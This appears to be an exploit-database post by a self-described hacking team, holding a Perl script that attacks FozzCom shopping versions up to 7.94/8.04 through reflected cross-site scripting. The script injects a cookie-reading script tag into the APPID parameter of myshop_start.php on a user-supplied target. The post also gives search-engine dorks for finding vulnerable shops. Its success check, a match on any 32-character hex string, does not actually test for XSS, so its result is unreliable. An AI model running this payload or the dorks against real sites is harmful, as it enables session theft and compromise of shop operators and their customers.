ExploitFixes
[D] PERL : FozzCom shopping<= 7.94+8.04 XSS Vulnerability [z] 2011-01-14 15:50:44
Inviato da: kedans

=-=-=-=-=-=-=-={In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# [D] PERL : FozzCom shopping<= 7.94+8.04 XSS Vulnerability [z]

# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com >

# Team : [D] HaCkErS-StreeT-Team [Z]

# + Allah Akbarr + Algerians HaCkErs

# Type : Perl

:::::::::::::::::::::::::(0xSTART):::::::::::::::::::::::::::::::::::::::

#!/usr/bin/perl

#FozzCom shopping<= 7.94+8.04 XSS
#Author KedAns-Dz
#Gre4tz: All HaCkerS-StreeT-Team DZ
#Special Gre4tz: Dr.Ride + Red1One + Islampard

print "|----------------------------------------------------|\n";
print "| FozzCom shopping<= 7.94 + 8.04 XSS |\n";
print "| |\n";
print "| Author by : KedAns-Dz |\n";
print "| |\n";
print "| Special ThanX f4r : exploit-db.com & bugsearch.net |\n";
print "| |\n";
print "| Team : [D] HaCkerS-StreeT-Team [Z] |\n";
print "| |\n";
print "| Special GreeTz : Dr.Ride + Islampard + Red1One |\n";
print "| |\n";
print "| E-Mails : ked-h (at) hotmail (dot) com |\n";
print "| |\n";
print "| : k-_-k1 (at) live (dot) fr |\n";
print "|----------------------------------------------------|\n";
print " \n";
print " \n";
print "|**********************************************************|\n";
print "[+] Vendor : http://www.fozztech.se\n";
print "[+] script : FozzCom shopping \n";
print "[+] Download : http://www.fozztech.se (sell script )\n";
print "[+] Vulnerability : XSS Vulnerability\n";
print "[+] Dork : inurl:myshop_start.php?APPID= \n";
print "[+] Dork : allintext:Powered by FozzCom. \n";
print "|***********************************************************|\n";
print " \n";
use LWP::UserAgent;
print "\n > XSS Target: 'http://target.com/path/' : ";
chomp(my $target1=<STDIN>);

#XSS Exploit
$xss="'><script>alert(document.cookie)</script>";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target1 . "myshop_start.php?APPID=".$xss."";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
print "Exploit succeeded !! ...\n";
print "[+]ked> $target1 $xss";
print "..:: By KedAns-Dz ::.\n";
print "\n";
print " ->> HaCkerS-StreeT-Team : ";
print "KedAns-Dz + BadR0 + Dr.Ride + Red1One + XoreR + FOX-DZ + Islampard + NoR0 FouinY + Zaki.ENG + Hani NiN0\n";
print "Allaho Akbar\n";
print "\n";
}
else{print "\n[-] Errur Exploit!...\n";
}
# By KedAns-Dz

:::::::::::::::::::::::::::::(0xEOF):::::::::::::::::::::::::::::::::::::::

# [D] HaCkerS-StreeT-Team [Z] > Algerians HaCkErs <

-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --